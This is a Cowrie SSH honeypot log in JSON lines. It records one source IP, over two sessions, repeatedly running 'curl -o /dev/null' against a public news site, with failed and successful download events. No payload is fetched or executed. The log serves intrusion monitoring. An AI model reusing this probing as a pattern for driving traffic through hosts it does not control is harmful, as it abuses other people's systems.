{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.826005Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:01.850229Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.851410Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.875388Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.877574Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:01.904497Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.905761Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.929538Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.931388Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:01.934220Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:01.935525Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:02.054394Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.055671Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:02.119749Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.121020Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.142455Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.144940Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:02.194784Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.196337Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.198316Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.201644Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.241333Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:02.243573Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.244742Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.249421Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:02.279114Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.280000Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.283983Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:02.301913Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.303576Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.318191Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.320271Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.354848Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.396256Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.418403Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:02.434568Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.435660Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.442052Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:02.456806Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.457970Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.489916Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:02.494716Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.495972Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:02.518155Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.519033Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:02.547616Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.548831Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.553969Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.573080Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:02.604119Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.605272Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.706003Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.708262Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.756423Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.793870Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.795928Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:02.825705Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.826863Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.839641Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.843520Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:02.848025Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.849094Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.853383Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:02.872784Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.873916Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:02.892266Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.893486Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:02.907798Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.908847Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.923843Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:02.936331Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.937485Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:02.954615Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.955736Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.971658Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.973437Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:02.985368Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:02.986409Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:03.003288Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.004580Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.012547Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.014080Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:03.039374Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.040663Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:03.054193Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.055385Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:03.104883Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.106097Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.108876Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.110331Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:03.113625Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.114471Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:03.171857Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.173076Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:03.176184Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.177220Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.249469Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.254423Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.303595Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:03.376400Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.377760Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:03.380648Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.381788Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.387774Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:03.428762Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.430034Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:03.433620Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.435155Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.437818Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.442810Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.459118Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.509974Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.511455Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:03.532262Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.533315Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:03.535962Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.536844Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.563961Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:03.580512Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.581784Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:03.597019Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
